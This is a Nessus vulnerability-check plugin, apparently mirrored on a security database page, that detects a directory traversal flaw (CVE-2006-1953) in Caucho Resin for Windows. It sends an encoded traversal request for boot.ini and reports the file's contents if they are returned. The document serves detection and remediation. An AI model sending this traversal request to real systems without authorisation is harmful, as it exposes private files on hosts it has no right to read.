Lucene search
This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.RESIN_DIR_TRAVERSAL.NASLHistoryMay 27, 2006 - 12:00 a.m.
Resin for Windows Encoded URI Traversal Arbitrary File Access
2006-05-2700:00:00
This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.
www.tenable.com
31
The remote host is running Resin, an application server.
The installation of Resin on the remote host allows an unauthenticated remote attacker to gain access to any file on the affected Windows host, which may lead to a loss of confidentiality.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(21606);
script_version("1.23");
script_cvs_date("Date: 2018/11/15 20:50:25");
script_cve_id("CVE-2006-1953");
script_bugtraq_id(18005);
script_name(english:"Resin for Windows Encoded URI Traversal Arbitrary File Access");
script_summary(english:"Tries to retrieve boot.ini using Resin");
script_set_attribute(attribute:"synopsis", value:
"The remote web server is prone to directory traversal attacks.");
script_set_attribute(attribute:"description", value:
"The remote host is running Resin, an application server.
The installation of Resin on the remote host allows an unauthenticated
remote attacker to gain access to any file on the affected Windows
host, which may lead to a loss of confidentiality.");
script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/434150/30/0/threaded");
script_set_attribute(attribute:"see_also", value:"http://www.caucho.com/download/changes.xtp");
script_set_attribute(attribute:"solution", value:"Upgrade to Resin 3.0.19 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"plugin_publication_date", value:"2006/05/27");
script_set_attribute(attribute:"vuln_publication_date", value:"2006/05/16");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:caucho:resin");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"Web Servers");
script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");
script_dependencies("http_version.nasl");
script_require_ports("Services/www", 8080);
script_require_keys("www/resin");
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:8080);
# Unless we're paranoid, make sure the banner is from Resin.
if (report_paranoia < 2)
{
banner = get_http_banner(port:port);
if (!banner) exit(1, "Unable to get the banner from web server on port "+port+".");
if ("Resin" >!< banner) exit(1, "The web server on port "+port+" does not appear to be Resin.");
}
# Try to exploit the issue to get a file.
file = "boot.ini";
u = string("/C:%5C/", file);
r = http_send_recv3(method:"GET",item:u, port:port, exit_on_fail:TRUE);
# There's a problem if looks like boot.ini.
if ("[boot loader]">< r[2])
{
if (report_verbosity > 0)
{
report = '\n' +
"Nessus was able to retrieve the contents of '\boot.ini' using the" + '\n' +
'following URL :\n' +
'\n' +
' ' + build_url(port:port, qs:u) + '\n';
if (report_verbosity > 1)
report += '\nHere is its contents :\n\n' + r[2] + '\n';
security_hole(port:port, extra:report);
}
else security_hole(port);
}
Related
cvelist
cvelist
CVE-2006-1953
2006-05-17 10:00:00
securityvulns
securityvulns
Caucho Resin Windows Directory Traversal Vulnerability
2006-05-17 00:00:00
prion
prion
Directory traversal
2006-05-17 10:06:00
packetstorm
packetstorm
Rapid7 Security Advisory 24
2006-05-22 00:00:00
cve
cve
CVE-2006-1953
2006-05-17 10:06:00
Related for RESIN_DIR_TRAVERSAL.NASL